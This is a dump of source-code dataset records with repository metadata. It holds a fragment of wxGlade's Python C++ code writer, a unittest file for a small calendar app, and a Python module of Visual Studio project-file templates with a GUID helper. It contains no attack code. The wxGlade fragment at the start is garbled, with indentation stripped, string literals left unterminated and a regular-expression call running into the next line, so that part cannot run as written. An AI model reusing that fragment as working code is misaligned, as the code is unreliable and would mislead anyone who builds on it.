extra_code_h = self._tagcontent('::extracode', extra_code_h)
hout.append(extra_code_h)
hout.append('\n')
# write the class body
for line in header_buffer:
hout.append(line)
hout.append('\n
# source file ----------------------------------------------------------------------------------------------
# write the common lines
sout.append(self.header_lines[0])
sout.append('
# insert the extra code of this class
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
extra_code_cpp = self._tagcontent('::extracode', extra_code_cpp)
sout.append(extra_code_cpp)
sout.append('\n')
# write the class implementation
sout.extend(source_buffer)
# store source to disk
self.save_file(header_file, hout)
self.save_file(source_file, sout)
else: # not self.multiple_files
# write the class body onto the single source file
self.output_header.extend(header_buffer)
self.output_file.extend(source_buffer)
def add_object(self, klass, parent, parent_builder, obj):
# get the widget builder instance
builder = self._get_object_builder(klass, obj)
if not builder: return None
try:
init, ids, final = builder.get_code(obj)
except:
print(obj)
raise # this shouldn't happen
if not obj.IS_SIZER:
if obj.check_prop_truth("extracode_pre"):
init = obj.properties["extracode_pre"].get_lines() + init
if obj.check_prop_truth("extracode_post"):
init += obj.properties["extracode_post"].get_lines()
if obj.check_prop_truth('extraproperties'):
init += self.generate_code_extraproperties(obj)
mycn = getattr(builder, 'cn', self.cn)
for win_id, evt, handler, evt_type in builder.get_event_handlers(obj):
klass.event_handlers.append( (win_id, mycn(evt), handler, evt_type) )
extra_code = getattr(builder, 'extracode', getattr(obj, 'extracode', "") or "" )
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^ if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
# if we are not overwriting existing source, warn the user about the presence of extra code
if not self.multiple_files and self.previous_source:
self.warning( '%s has extra code, but you are not overwriting existing sources: please check '
'that the resulting code is correct!' % obj.name )
klass.ids.extend(ids)
if self.store_as_attr(obj):
if obj.check_prop("instance_class"):
klassname = obj.instance_class
else:
klassname = obj.get_prop_value("class", obj.WX_CLASS)
klass.sub_objs.append( (klassname, obj.name) )
klass.init.extend(init)
if parent_builder: # add to sizer or notebook
klass.init.extend( parent_builder.get_code_per_child(parent, obj) )
klass.final[:0] = final
if self.multiple_files and obj.IS_CLASS:
klass.dependencies.append(obj.klass)
else:
if obj.WX_CLASS in self.obj_builders:
headers = getattr(self.obj_builders[obj.WX_CLASS], 'import_modules', [])
klass.dependencies.update(headers)
return builder
def generate_code_event_handler(self, code_obj, is_new, tab, prev_src, event_handlers):
code_lines = []
swrite = code_lines.append
if not event_handlers:
return []
tmpl_handler = """
void %(klass)s::%(handler)s(%(evt_type)s &event) // wxGlade: %(klass)s.<event_handler>
{
%(tab)sevent.Skip();
%(tab)s// notify the user that he hasn't implemented the event handler yet
%(tab)swxLogDebug(wxT("Event handler (%(klass)s::%(handler)s) not implemented yet"));
}
"""
if prev_src:
already_there = prev_src.event_handlers.get(code_obj.klass, set())
else:
already_there = set()
for win_id, event, handler, evt_type in event_handlers:
if handler not in already_there:
swrite( tmpl_handler % {'evt_type': evt_type, 'handler': handler, 'klass': code_obj.klass, 'tab': tab} )
already_there.add( handler )
if is_new or not prev_src:
swrite('\n\n')
swrite('// wxGlade: add %s event handlers\n' % code_obj.klass)
if is_new or not prev_src:
swrite('\n')
return code_lines
def generate_code_event_table(self, code_obj, is_new, tab, prev_src, event_handlers):
code_lines = []
write = code_lines.append
if not event_handlers:
return code_lines
if prev_src and code_obj.klass in prev_src.event_table_decl:
has_event_table = True
else:
has_event_table = False
if is_new or not has_event_table:
write('\nBEGIN_EVENT_TABLE(%s, %s)\n' % (code_obj.klass, code_obj.WX_CLASS))
write(tab + '// begin wxGlade: %s::event_table\n' % code_obj.klass)
for obj, event, handler, evt_type in event_handlers:
if obj is None: continue
if isinstance(obj, str):
win_id = obj
else:
win_id = self.generate_code_id(obj)[1]
if 'EVT_NAVIGATION_KEY' in event:
tmpl = '%(tab)s%(event)s(%(klass)s::%(handler)s)\n'
else:
tmpl = '%(tab)s%(event)s(%(win_id)s, %(klass)s::%(handler)s)\n'
details = { 'tab': tab, 'event': event, 'win_id': win_id, 'klass': code_obj.klass, 'handler': handler }
write(tmpl % details)
write(tab + '// end wxGlade\n')
if is_new or not has_event_table:
write('END_EVENT_TABLE();\n\n')
return code_lines
def generate_code_id(self, obj, id=None):
if id is None:
id = obj.window_id
if not id:
if obj is not None and obj.check_prop_truth("stockitem"):
return '', "wxID_" + obj.stockitem
return '', 'wxID_ANY'
id = str(id)
tokens = id.split('=', 1)
if len(tokens) != 2:
return '', tokens[0]
name, val = tokens
if not name:
return '', val
name = name.strip()
val = val.strip()
if val == '?':
val = self.generated_ids.get(name)
if val is None:
val = 'wxID_HIGHEST + %d' % self.last_generated_id
self.last_generated_id += 1
self.generated_ids[name] = val
else:
val = val
return '%s = %s' % (name, val), name
def generate_code_size(self, obj):
objname = self.format_generic_access(obj)
if obj.IS_CLASS:
name2 = 'this'
else:
name2 = obj.name
size = obj.properties["size"].get_string_value()
use_dialog_units = (size[-1] == 'd')
method = 'SetMinSize' if obj.parent_window else 'SetSize'
if use_dialog_units:
return '%s%s(wxDLG_UNIT(%s, wxSize(%s)));\n' % (objname, method, name2, size[:-1])
return '%s%s(wxSize(%s));\n' % (objname, method, size)
def quote_path(self, s):
return 'wxT(%s)' % super(CPPCodeWriter, self).quote_path(s)
def _quote_str(self, s):
if self._use_gettext:
return '_("%s")' % s
return 'wxT("%s")' % s
def format_generic_access(self, obj):
if obj.IS_CLASS:
return ''
return '%s->' % obj.name
def _format_dependencies(self, dependencies):
dep_list = []
for dependency in sorted(dependencies):
if dependency and ('"' != dependency[0] != '<'):
dep_list.append('#include "%s.h"\n' % dependency)
else:
dep_list.append('#include %s\n' % dependency)
return self._tagcontent( '::dependencies', dep_list )
writer = CPPCodeWriter() # The code writer is an instance of CPPCodeWriter
language = writer.language # Language generated by this code generator
| true | true |
f710299efd3e51d5e4b2e5cd7c0de74cacf615c7 | 3,230 | py | Python | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | import sys
import os
from io import StringIO
from datetime import datetime
import unittest
from unittest.mock import patch
sys.path.append(os.path.abspath("./src/"))
from calendarApp.models import Event, Calendar
class CalendarModelTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data1 = {
"name": "Test Event 1",
"start_time": "01/01/2000 00:00:00",
"end_time": "01/01/2001 00:00:00"
}
cls.data2 = {
"name": "Test Event 2",
"start_time": "01/01/2001 00:00:00",
"end_time": "01/01/2002 00:00:00"
}
@classmethod
def tearDownClass(cls):
del cls.data1
del cls.data2
def setUp(self):
self.calendar = Calendar("Test")
def tearDown(self):
del self.calendar
def test_event_add(self):
# Test Configuration and Setup
with patch('sys.stdout', StringIO()) as print_output:
# Test Function
self.calendar.add_event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
calendar_event = self.calendar.schedule[0]
# Test Assertions
self.assertEqual(
f"[INFO] Event {self.data1['name']} added", print_output.getvalue().rstrip())
self.assertEqual(self.data1["name"], calendar_event.name)
def test_event_delete(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
calendar_event = self.calendar.schedule[0]
with patch('sys.stdout', StringIO()) as print_output:
# Test Function
self.calendar.delete_event([str(calendar_event.id)])
# Test Assertions
self.assertEqual(
f"[INFO] Event(s) ['{calendar_event.id}'] removed", print_output.getvalue().rstrip())
self.assertFalse(self.calendar.schedule)
def test_event_order(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"]),
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
# Test Function
self.calendar.order_events()
# Test Assertions
self.assertLess(
self.calendar.schedule[0].start_time, self.calendar.schedule[1].start_time)
def test_event_print(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"]),
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"])
]
# Test Assertions
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.print_events()
self.assertTrue(self.data1["name"] in print_output.getvalue())
self.assertTrue(self.data2["name"] in print_output.getvalue())
if __name__ == "__main__":
unittest.main()
| 31.666667 | 101 | 0.583901 | import sys
import os
from io import StringIO
from datetime import datetime
import unittest
from unittest.mock import patch
sys.path.append(os.path.abspath("./src/"))
from calendarApp.models import Event, Calendar
class CalendarModelTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data1 = {
"name": "Test Event 1",
"start_time": "01/01/2000 00:00:00",
"end_time": "01/01/2001 00:00:00"
}
cls.data2 = {
"name": "Test Event 2",
"start_time": "01/01/2001 00:00:00",
"end_time": "01/01/2002 00:00:00"
}
@classmethod
def tearDownClass(cls):
del cls.data1
del cls.data2
def setUp(self):
self.calendar = Calendar("Test")
def tearDown(self):
del self.calendar
def test_event_add(self):
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.add_event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
calendar_event = self.calendar.schedule[0]
self.assertEqual(
f"[INFO] Event {self.data1['name']} added", print_output.getvalue().rstrip())
self.assertEqual(self.data1["name"], calendar_event.name)
def test_event_delete(self):
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
calendar_event = self.calendar.schedule[0]
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.delete_event([str(calendar_event.id)])
self.assertEqual(
f"[INFO] Event(s) ['{calendar_event.id}'] removed", print_output.getvalue().rstrip())
self.assertFalse(self.calendar.schedule)
def test_event_order(self):
self.calendar.schedule = [
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"]),
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
self.calendar.order_events()
self.assertLess(
self.calendar.schedule[0].start_time, self.calendar.schedule[1].start_time)
def test_event_print(self):
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"]),
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"])
]
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.print_events()
self.assertTrue(self.data1["name"] in print_output.getvalue())
self.assertTrue(self.data2["name"] in print_output.getvalue())
if __name__ == "__main__":
unittest.main()
| true | true |
f71029e0362daf93beff056b71cb94f06389a620 | 15,953 | py | Python | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | 2 | 2020-01-08T02:19:18.000Z | 2022-01-11T09:06:03.000Z | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | null | null | null | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | 1 | 2020-12-30T22:21:14.000Z | 2020-12-30T22:21:14.000Z | """Visual Studio Helper Utils."""
#===============================================================================
# Imports
#===============================================================================
import uuid
#===============================================================================
# Globals
#===============================================================================
vcxproj_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|Win32">
<Configuration>PGInstrument</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|x64">
<Configuration>PGInstrument</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|Win32">
<Configuration>PGUpdate</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|x64">
<Configuration>PGUpdate</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>%(guid)s</ProjectGuid>
<RootNamespace>%(name)s</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<PropertyGroup Label="UserMacros">
<%(dirname_macro_name)s>%(dirname_macro_value)s</%(dirname_macro_name)s>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(pcbuild_prefix)s%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
%(includes)s
%(compiles)s
%(resources)s
%(others)s<ItemGroup>
<ProjectReference Include="pythoncore.vcxproj">
<Project>{cf7ac3d1-e2df-41d2-bea6-1e2556cdea26}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>"""
vcxproj_filters_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
%(source_filterdef)s
%(include_filterdef)s
%(resource_filterdef)s
%(python_filterdef)s
%(cython_filterdef)s
%(other_filterdef)s
</ItemGroup>
%(source_filters)s
%(include_filters)s
%(resource_filters)s
%(python_filters)s
%(cython_filters)s
%(other_filters)s
</Project>"""
props_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
props_debug_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_debug_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_debug_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
# Template for the generated GUID snippet: one '%s' slot for the project
# GUID plus one per filter-definition group.
guids_template = """\
guid = '%s'
source_filterdef_guid = '%s'
include_filterdef_guid = '%s'
other_filterdef_guid = '%s'
python_filterdef_guid = '%s'
cython_filterdef_guid = '%s'
resource_filterdef_guid = '%s'
"""

# Number of GUIDs to generate, derived from the template's '%s' slot count.
num_guids = guids_template.count('%s')
#===============================================================================
# Helper Methods
#===============================================================================
def gen_guids():
    """Return ``guids_template`` filled in with freshly generated GUIDs.

    Each GUID is rendered uppercase and wrapped in braces ('{...}'), the
    format Visual Studio project/filter files expect.

    Uses ``uuid.uuid4()`` (random) instead of the original ``uuid.uuid1()``:
    uuid1 embeds the host's MAC address and a timestamp, which needlessly
    leaks host information — any unique GUID works here.
    """
    new_guids = tuple('{%s}' % str(uuid.uuid4()).upper()
                      for _ in range(num_guids))
    return guids_template % new_guids
#===============================================================================
# Helper Classes
#===============================================================================
# vim:set ts=8 sw=4 sts=4 tw=0 et :
| 50.166667 | 179 | 0.692848 |
import uuid
vcxproj_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|Win32">
<Configuration>PGInstrument</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|x64">
<Configuration>PGInstrument</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|Win32">
<Configuration>PGUpdate</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|x64">
<Configuration>PGUpdate</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>%(guid)s</ProjectGuid>
<RootNamespace>%(name)s</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<PropertyGroup Label="UserMacros">
<%(dirname_macro_name)s>%(dirname_macro_value)s</%(dirname_macro_name)s>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
